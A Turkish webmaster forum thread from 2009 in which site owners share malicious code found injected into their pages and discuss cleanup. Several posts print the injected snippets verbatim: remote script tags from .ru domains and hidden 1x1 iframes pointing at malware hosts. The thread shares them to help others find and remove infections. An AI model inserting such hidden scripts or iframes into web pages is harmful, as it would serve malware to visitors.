Dosyalarınıza bulaşan trojan kod çeşitleri

husmen73 (Gulhin) · March 08, 2009, 06:33:32 AM

Web sitenize girerken "bu site saldırgan olarak belirlenmiş" diye bir uyarı mı alıyorsunuz?

Burada, dosyalarınıza bulaşabilecek zararlı kodları bulabilir ve bunları sitenizdeki tüm dosyaların kodlarında arayıp silerek çözüme kavuşabilirsiniz. Zararlı kodların temizlenmesinden sonra "bu site saldırgan olarak belirlenmiş" uyarısının gitmesi biraz zaman alabilir.

Zararlı Kod #1

Code (Bu kod genellikle </body> etiketinden önce eklenir.) Select

<script src=http://www.netcfg9.ru/script.js></script><script src=http://www.chk06.ru/script.js></script><script src=http://www.chk06.ru/script.js></script><script src=http://www.chk06.ru/script.js></script>

Zararlı Kod #2

Code (Bu kod genellikle </html> etiketinden sonra eklenir.) Select


<iframe src="http://goooogleadsence.biz/?click=1C95CF" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Not: Eğer bu tür zararlı kodları biliyorsanız lütfen gösterdiğim gibi mesajınıza ekleyiniz.

Önemli not: Zararlı kodları temizleme hakkında destek vermiyoruz, bu konu sadece bilgilendirme amaçlı açılmıştır.

harunkaraca · March 08, 2009, 05:34:50 PM

ya bu ruslar iyice canımı sıkmaya başladı !
botlar artık görsel dogrulamayıda geçiyor sanırım 1.1.8 sitemin birindee sürekli üye siliyordum :s
adult sitelerin reklamını veya linklerini yayınlamak için konu bile açıyorlar

)
bu adresleri tespit edip cpanel den ip adreslerini banlayarak kurtuldum.

Paragaya · March 09, 2009, 03:53:34 AM

Önemli bir konu saol

grafitus · March 09, 2009, 01:05:43 PM

Saol husmen..

agguvenligi · March 11, 2009, 07:19:17 AM

Çok iyi bir bilgilendirme olmuş bazı arkadaşlarımda bu problem vardı kod temizliği yaparak halletmiştik.

karadenizkaplani · March 18, 2009, 08:52:09 AM

EFET OLUYOR PANEL GİRDİĞİMDE REKLAM ÇIKIYOR...

Tias_ · March 18, 2009, 12:19:06 PM

bu kod bilgisayarınızada bulaşıyor bilginize.Bilgisayarınıza format atın daha sonra ftp'den index.php'lerin hepsini indirip en altına bulunan bu kodları silip tekrar upload ediniz.

baycall · March 18, 2009, 11:08:33 PM

İşte şu index olayında yanılıyorsunuz arkadaşlar sadece indexde var zannediyordum..2 gün evvel ama sadece indexde değil lood.php,ssi,ssi.example falan herşeye bulaşmış temizlemek bir hayli zaman aldı iframe bir koddu...burada arkadaşların dediklerini yaptım hepsini sildim bilgisayarımı tarattım öncesinde sonra format attım yine virüs taraması yaptım ve dosyaları atar atmaz şifremi değiştirdim..

«['BrKDmRcN']» · April 06, 2009, 08:24:54 AM

Code Select

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>

</body> den önce buda ekleniyor bunuda ekleyebilir misiniz?

Yağız... · April 06, 2009, 09:26:50 AM

Bu dosyanin virüs oldugunu zannetmiyorum...

Evo™ · April 07, 2009, 05:57:34 AM

@«['BrKDmRcN']» verdiğin kod Google Analytics'e ait ve virüs değil.

«['BrKDmRcN']» · April 07, 2009, 06:16:14 AM

O kodu ekleyince avast siteye girdirmiyor ama şimdi onu silince şuan o uyarı çıkmıyor.

ayesoft · April 09, 2009, 04:48:43 AM

Quote from: «['BrKDmRcN']» on April 07, 2009, 06:16:14 AM
O kodu ekleyince avast siteye girdirmiyor ama şimdi onu silince şuan o uyarı çıkmıyor.

analytics.com google 'ın webmasterlara ücretsiz sunduğu normalde aylık 300/400 $ değerindeki bir sistemdir.

Sitenizin detaylı hit v.b. bilgilerini tutar bunun içinde bütün sayfalarda çalışacak bir kod eklenmesi gerekir ve yine bu kodu google değil webmaster kendisi koyar sitesine ve genelde smfde index.templateye ekleriz biz bu kodu. Yani konu kendiliğinden eklenen kodlarla ilgili verdiğin kodu google asla kendi eklemez

pandemi001 · April 12, 2009, 02:14:33 AM

hxxp:goooogleadsence.biz [nonactive]

bu linke bende rastladım beta 4 kulanıyordum siteyi komple silip rc1 kurdum

hukuk (judge) · April 13, 2009, 04:13:05 PM

Selamlar Sn. Tsey - husmen73 (Gulhin) ,
Bazı bilgisayarlardan siteme giriş yapıldığında virüs uyarısı alınıyormuş. Bu kodların sitemize bulaşıp bulaşmadığını nasıl anlayabiliriz?
Saygılar

FinaLonLine · April 13, 2009, 11:24:11 PM

bu Kodlar ben Baya Bi yormustu

Sitem Direk Googledeki Linkimden Dağıtıyordu Trojeni ve 360 tane Trojen sallıyordu bilgisayara

Ama işin tuhafı sadece googledki linkimden dağıtıyordu trojeni normal expolerden bişey yoktu forumun yedeğini alıp sildim ve tekrar kurdum bişey kalmadı ama bu trojen sitemi bi anda googledki yerimden 15 sayfa geri attı baya deli bir trojenmiş

simdi bişey yok ama Şüphelendiğim tek sey ntv haberden cekmem oldunu sanıyorum cunku ntv haber sitesi siteadvisordede kara listede viruslü olarak gorunuyor kullanan arkadaşlar varsa değiştirsinler

husmen73 (Gulhin) · April 18, 2009, 09:02:30 AM

Quote from: hukuk on April 13, 2009, 04:13:05 PM
Selamlar Sn. Tsey - husmen73 (Gulhin) ,
Bazı bilgisayarlardan siteme giriş yapıldığında virüs uyarısı alınıyormuş. Bu kodların sitemize bulaşıp bulaşmadığını nasıl anlayabiliriz?
Saygılar

Sitenize girişlerde virüs uyarısı alıyosanız zaten bulaşmış demektir. Ben avast home kullanıyorum, bana bayağı yardımı dokunuyor. Bu program ile sitenizin tüm dosyalarını taratabilirsiniz (öncelikle FTP'deki tüm dosyaları bilgisayarınıza indirip, taramayı yapın) Ayrıca http://safety.live.com (Online Tarama) adresinden de kendi bilgisayarınızı zararlı içeriklerden temizleyebilirsiniz.

turanordusu.tc · April 18, 2009, 08:59:52 PM

Ben geçen forum u komple indirip, öyle tarama yaptım esed nod32 ile. En doğru olanı da bu galiba, sonra yine aynı yere atıyorsunuz forum u.

The-Hatip · April 19, 2009, 03:00:04 PM

Kardeşim avast filan boş. Bilgisayarında Başlat > Çalıştır > Msconfig yaz başlangıça gel eğer ntos.exe yazıyorsa tamamdır o bilgisayardan her ftp ye girdiğinizde şifrenizi alır ve her index.php veya index.html veya default isimli dosyaları indexler o yüzden hosting firmaları da anlayamaz benim başıma geldi sorunu anca kendim çözdüm. Hosting firmanızın yapacağı bir iş kalmıyor zaten direk forumun yedeğini alıp silin daha sonra tekrar kurun fakat başka bir pc den yani ntos.exe bulunmayan bi pc den saygılarımla...

turanordusu.tc · April 21, 2009, 08:46:16 PM

Quote from: The-Hatip on April 19, 2009, 03:00:04 PM
Kardeşim avast filan boş. Bilgisayarında Başlat > Çalıştır > Msconfig yaz başlangıça gel eğer ntos.exe yazıyorsa tamamdır o bilgisayardan her ftp ye girdiğinizde şifrenizi alır ve her index.php veya index.html veya default isimli dosyaları indexler o yüzden hosting firmaları da anlayamaz benim başıma geldi sorunu anca kendim çözdüm. Hosting firmanızın yapacağı bir iş kalmıyor zaten direk forumun yedeğini alıp silin daha sonra tekrar kurun fakat başka bir pc den yani ntos.exe bulunmayan bi pc den saygılarımla...

Burda ; genel, SYSTEM.INI, WIN.INI, BOOT.INI Gibi bölümler var. Hangisinde ne yapmamız gerekiyor anlayamadım ben bunu..

husmen73 (Gulhin) · April 22, 2009, 05:48:49 AM

Quote from: turklerinneti.com on April 21, 2009, 08:46:16 PM
Quote from: The-Hatip on April 19, 2009, 03:00:04 PM
Kardeşim avast filan boş. Bilgisayarında Başlat > Çalıştır > Msconfig yaz başlangıça gel eğer ntos.exe yazıyorsa tamamdır o bilgisayardan her ftp ye girdiğinizde şifrenizi alır ve her index.php veya index.html veya default isimli dosyaları indexler o yüzden hosting firmaları da anlayamaz benim başıma geldi sorunu anca kendim çözdüm. Hosting firmanızın yapacağı bir iş kalmıyor zaten direk forumun yedeğini alıp silin daha sonra tekrar kurun fakat başka bir pc den yani ntos.exe bulunmayan bi pc den saygılarımla...
Burda ; genel, SYSTEM.INI, WIN.INI, BOOT.INI Gibi bölümler var. Hangisinde ne yapmamız gerekiyor anlayamadım ben bunu..

Zararlı yazılımlarla ilgili doctus.org sitesi var. Oradan destek alabilirsiniz.

Quote from: The-Hatip on April 19, 2009, 03:00:04 PM
Kardeşim avast filan boş.

Avast'ın boş olduğunu nasıl söyleyebiliyorsunuz anlamıyorum. Kullanılan yazılımlar kaçak ve güncellemesi olmazsa zaten bir işe yaramaz.

turanordusu.tc · April 22, 2009, 03:21:49 PM

The Hatip arkadaşımızın verdiği komut ; Geri yükleme komutu şimdi dikkatimi çekti de.

Bunu zaten biliyordum ben.

Zararlı yazılımlar konusundaki verdiğiniz bilgi için teşekkürler. Burdan yardım alıcam..

abdull@h · April 28, 2009, 03:23:58 PM

ewet arkadaşlar geçenlerde ftpdeki dosyaları kontrol ettiğimde bi tane bende buldum ve siznle paylaşmak istedim mümkünse bunuda eklermisiniz

Code Select

<iframe frameborder=off src=http://cacbuhub.cn/pa.html width=1 height=1 ></iframe>

Pяηѕѕ LF · May 12, 2009, 05:55:38 PM

Merhaba,

ben hic bir mod veya herhangi bir degisiklik yapmadan sayfanin altinda ie'de hata mesaji aliyorum.

ve dosyalari kontrol ederken asagi yukari butun sayfalarda bu kod vardi. En ust tarafta. ilginc genelde 4 5 satirlik scriptler oluyor bu artik ne ise yariyorsa $:-\$ antivirusum genelde zararli trojan scriptler oldugunda ötüyö

bunda ses yok.

bu kodlari silmeye calisiyorum her actigim dosyada var

silip 444 chmod ayarlari 444 yapiyorum.

ie hatasi bu kod ile ilgisi olmasa gerek siliyorum siliyorum hala mesaj duruyor

"membre introuvable" hatasi. silmeye devam ediyorum.

altaki kod hakkinda bilgilenderebilirseniz.

kolay gelsin.

// Yağız: Sayfayı aşırı uzattığından kodları kaldırmak zorunda kaldım.

DNA27 · May 12, 2009, 08:17:33 PM

aynı bu kod aylarca eklendi ben sildim o geldi o geldi ben sildim :=)
hatırladıgım kadar sizde yazmıştınız bu soruna .

çözümü şunda buldum ilk olarak ftp yi boşalttım antivir ile arattım sonra indexleri aradım tek tek temızledim.

ftp şifremi değiştim file zilla da kayıtlı idi sitem oradan da sildim daha sonra ne gelen ne giden oldu

http://www.simplemachines.org/community/index.php?topic=240751.msg1552494#msg1552494

http://www.simplemachines.org/community/index.php?topic=244570.msg1579562#msg1579562

http://www.simplemachines.org/community/index.php?topic=274959.msg1802205#msg1802205

Pяηѕѕ LF · May 18, 2009, 03:06:25 PM

Merhaba,

Ben format attim, dosyalari temizledim tek tek php js txt css ne varsa, ftp sifrelerini degistirdim, host sirketi bizde sorun yok sizde var gibi dedi bana

, 2.3 tane son model antivirus ile taradim, trojan malware programlara tarama yaptim vs.. ufak seyler buldu sildi tekrar islemleri yaptim yine olmadi

o kadar saatimi verdim yok benim bilgisayarimi cok sevmis olsa gerekki napsam kurtulamiyorum.

Araya araya arkadasim hakkinda bilgi edindim..

son dönemlerin yildizi parlayan scripti.. bizede bulasmis.

Artik hayirlisi olur insAllah diyorum ve bir süre dinlenmeye cekiliyorum $:-\$

> Gumblar Injekted Script Hakkinda <

Allah c.c hepinizi bu script'en uzak tutsun.. Amin.

turanordusu.tc · May 18, 2009, 03:32:26 PM

Bu sayfanın yapısı bozuk görünüyor bende arkadaşlar. Son mesajlardan sonra sanırım çok genişlemiş sayfa yanlara doğru. İlk sayfada sorun yok ama bu 2. sayfa bozuk gösteriyor. Sadece bilgi amaçlı söyleyeyim dedim herkeste de böylemi bilmiyorum..

DNA27 · May 18, 2009, 06:22:48 PM

Quote from: Pяєηѕєѕ 丂√丂 on May 18, 2009, 03:06:25 PM
Merhaba,

Ben format attim, dosyalari temizledim tek tek php js txt css ne varsa, ftp sifrelerini degistirdim, host sirketi bizde sorun yok sizde var gibi dedi bana , 2.3 tane son model antivirus ile taradim, trojan malware programlara tarama yaptim vs.. ufak seyler buldu sildi tekrar islemleri yaptim yine olmadi o kadar saatimi verdim yok benim bilgisayarimi cok sevmis olsa gerekki napsam kurtulamiyorum.

Araya araya arkadasim hakkinda bilgi edindim..

son dönemlerin yildizi parlayan scripti.. bizede bulasmis.

Artik hayirlisi olur insAllah diyorum ve bir süre dinlenmeye cekiliyorum $:-\$

> Gumblar Injekted Script Hakkinda <

Allah c.c hepinizi bu script'en uzak tutsun.. Amin.

Amin

şimdide iframe virüsü çıktı yeni olarak bu daha da kötü

djasikurt · June 18, 2009, 03:44:24 PM

bu iframe vürüsü her kese vürüs salıyor yavs bundan kökten nasıl kurtuluruz siliyorum geri geliyor

abraham_ · July 10, 2009, 02:59:06 AM

S.a
Arkadaşlar siteye ilk girdiğimde giriş yapın diye çıkan safyfa açılıyor.Ancak giriş yaptığım anda virüs programı uyarı verip bağlantıyı kesiyor.İndex.php ve index.htm dosyalarında üç ayrı iframe bulup sildim daha önce sitenin yüzünü dahi göremeden kapanıyordu.Ancak şimdi giriş yaptıktan sonra veya her hangi bir kategoriye girdikten sonra virüs programı kapatıyor.Yardımcı olursanız çok sevinirim arkadaşlar...

husmen73 (Gulhin) · July 10, 2009, 04:49:43 AM

Quote from: abraham_ on July 10, 2009, 02:59:06 AM
S.a
Arkadaşlar siteye ilk girdiğimde giriş yapın diye çıkan safyfa açılıyor.Ancak giriş yaptığım anda virüs programı uyarı verip bağlantıyı kesiyor.İndex.php ve index.htm dosyalarında üç ayrı iframe bulup sildim daha önce sitenin yüzünü dahi göremeden kapanıyordu.Ancak şimdi giriş yaptıktan sonra veya her hangi bir kategoriye girdikten sonra virüs programı kapatıyor.Yardımcı olursanız çok sevinirim arkadaşlar...

Tüm dosyalarınızı virüse karşı kontrol etmelisiniz. Bende Avast Home var, bununla FTP'den tüm dosyaları indirip tarattığımda bana hangi dosyalarda virüs varsa gösteriyor. Bu yöntemi kullanabilirsiniz. (Avast güvenlik seviyesi en yüksekte)

abraham_ · July 11, 2009, 03:30:34 AM

Tüm dosyaları indirip avast 4.8 professionel ile tarattım birşey bulamadı.Olmadı karspersky 7.0 ile tarattım yine bir şey bulamadım.Ben bütün index.php dosyalarına kendim elimden geldiğice bakmaya çalıştım.Daha önce sitenin yüzünü dahi göremiyordum bütün index.php dosyalarında iframe vardı sildim onları site açıldı yani artık açılırken virüs uyarısı yapmıyor.Ayrıca temizlediğim tüm dosyaların izinlerinide 555 yaptım.Şimdi ise giriş yapınca veya her hangi bir kategoriye tıklayınca uyarı yapıyor avast ve uyarıda index.htm dosyasını gösteriyor ama benim ftpdeki dosyalarda index.php dışında index dosyası göremedim...

abraham_ · July 18, 2009, 02:48:56 AM

Sorun çözüldü arkadaşlar şu linkteki http://www.simplemachines.org/community/index.php?topic=323533.0 program ile dosyaları taratınca iframin bulunduğu tüm dosyaları bulabildim.Herkese kolay gelsin...

cee山 · July 23, 2009, 02:58:19 AM

Ellerine sağlık kardeş

turanordusu.tc · July 23, 2009, 04:42:04 AM

Ben merak ettiğim için bişey sormak istiyorum; Bu virüs kodlarını bi not defterinin içine yapıştırıp, masaüstüne alsak ve ben açsam, bizim bilgisayara da bulaşırmı bu ?

husmen73 (Gulhin) · August 06, 2009, 05:11:50 PM

Quote from: turklerinneti.com on July 23, 2009, 04:42:04 AM
Ben merak ettiğim için bişey sormak istiyorum; Bu virüs kodlarını bi not defterinin içine yapıştırıp, masaüstüne alsak ve ben açsam, bizim bilgisayara da bulaşırmı bu ?

Kodların kendisi mi virüs yoksa internet üzerinden otomatik mi indiriliyor buna bağlı. Sayfa açıldığında internetten indiriliyorsa ve internetin yoksa haliyle birşey olmayacaktır.

turanordusu.tc · August 08, 2009, 04:56:22 AM

Code Select

<iframe frameborder=off src=http://cacbuhub.cn/pa.html width=1 height=1 ></iframe>
Bunun gibi yada daha büyük virüs kodlarını, Not pad'e yapıştırıp, masaüstüne atsam ve daha sonra bunu sadece dosya olarak açsam demiştim bulaşırmı bizim bilgisayara da acaba ?

turanordusu.tc · August 12, 2009, 11:16:18 AM

Bununla ilgili kesin çözümü buldum ve sizinle de paylaşmak istedim arkadaşlar. Bu yöntemi daha önceden de kullanmıştım ama dün akşam ne kadar faydalı olduğunun farkına vardım.
http://onecare.live.com/site/tr-tr/default.htm burda koruma ve temizleme diye iki seçenek var. Bunların ikisini de ayrı ayrı yapın. Virüs bulaşmış tüm dosyalarınızı sildiğini göreceksiniz. Bunu yapmadan önce, çok önemli dosyalarınız varsa onların yedeğini alın ama (Temiz olduğunu düşündüklerinizin) Çünkü bulduğu tüm zararlı dosyaları siliyor.. Kolay gelsin.

mustea · August 13, 2009, 11:20:14 AM

çok teşekkürler ilaç gibi geldi.

turanordusu.tc · August 13, 2009, 07:53:02 PM

Quote from: mustea on August 13, 2009, 11:20:14 AM
çok teşekkürler ilaç gibi geldi.

Rica ederim.

News:

Dosyalarınıza bulaşan trojan kod çeşitleri